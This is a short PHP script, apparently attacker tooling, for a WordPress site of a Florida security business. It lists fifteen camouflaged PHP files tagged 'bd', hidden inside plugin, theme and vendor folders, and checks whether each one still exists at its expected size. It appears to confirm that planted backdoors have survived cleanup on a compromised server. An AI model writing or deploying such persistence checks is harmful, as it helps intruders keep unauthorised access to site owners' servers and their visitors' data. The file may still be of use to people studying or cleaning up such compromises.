<?php   $r = '/home/bestseocompany/public_html/agisecurityflorida.com'; $x = ["/video-surveillance/affordable-outdoor-security-cameras-florida/port2.php"=>"bd@@50688@@850",
"/image/.b26_sed_bak/time.js.php"=>"bd@@50692@@862",
"/wp-content/plugins/really-simple-ssl/lets-encrypt/vendor/fbett/le_acme2/src/LE_ACME2/Request/Order/barcodes4.php"=>"bd@@15141@@898",
"/wp-includes/css/dist/tbl_addfield.php"=>"bd@@14121@@1024",
"/wp-content/plugins/wp-rocket/inc/Engine/Media/AboveTheFold/Database/Schemas/show_intro.php"=>"bd@@14911@@950",
"/wp-content/themes/Divi/includes/builder/frontend-builder/assets/vendors/plugins/image/testmssql.php"=>"bd@@50497@@978",
"/wp-content/plugins/woocommerce/packages/email-editor/vendor-prefixed/packages/Symfony/Component/CssSelector/Parser/Handler/signon.auth.lib.php"=>"bd@@15473@@830",
"/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-name-field/addtemplateassoc.php"=>"bd@@27036@@973",
"/wp-content/plugins/really-simple-ssl/lets-encrypt/vendor/plesk/api-php-lib/src/Api/Struct/PhpHandler/none.php"=>"bd@@19107@@874",
"/tag/best-outdoor-security-cameras/table.referrals.php"=>"bd@@50602@@916",
"/wp-content/plugins/woocommerce/packages/email-editor/vendor-prefixed/packages/Symfony/Component/CssSelector/Parser/Tokenizer/source2doc.php"=>"bd@@14536@@819",
"/wp-content/plugins/woocommerce/packages/email-editor/vendor-prefixed/packages/Symfony/Component/CssSelector/XPath/Extension/document.php"=>"bd@@16584@@1030",
"/wp-content/plugins/woocommerce/lib/packages/Symfony/Component/CssSelector/Parser/Tokenizer/install.sh404sef.php"=>"bd@@20714@@895",
"/wp-content/plugins/really-simple-ssl/lets-encrypt/vendor/fbett/le_acme2/src/LE_ACME2/Response/Account/phocalongtext.php"=>"bd@@17208@@1042",
"/wp-content/plugins/wp-rocket/inc/Engine/Media/PreloadFonts/Database/Queries/gd_detect.php"=>"bd@@25752@@899"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!'); 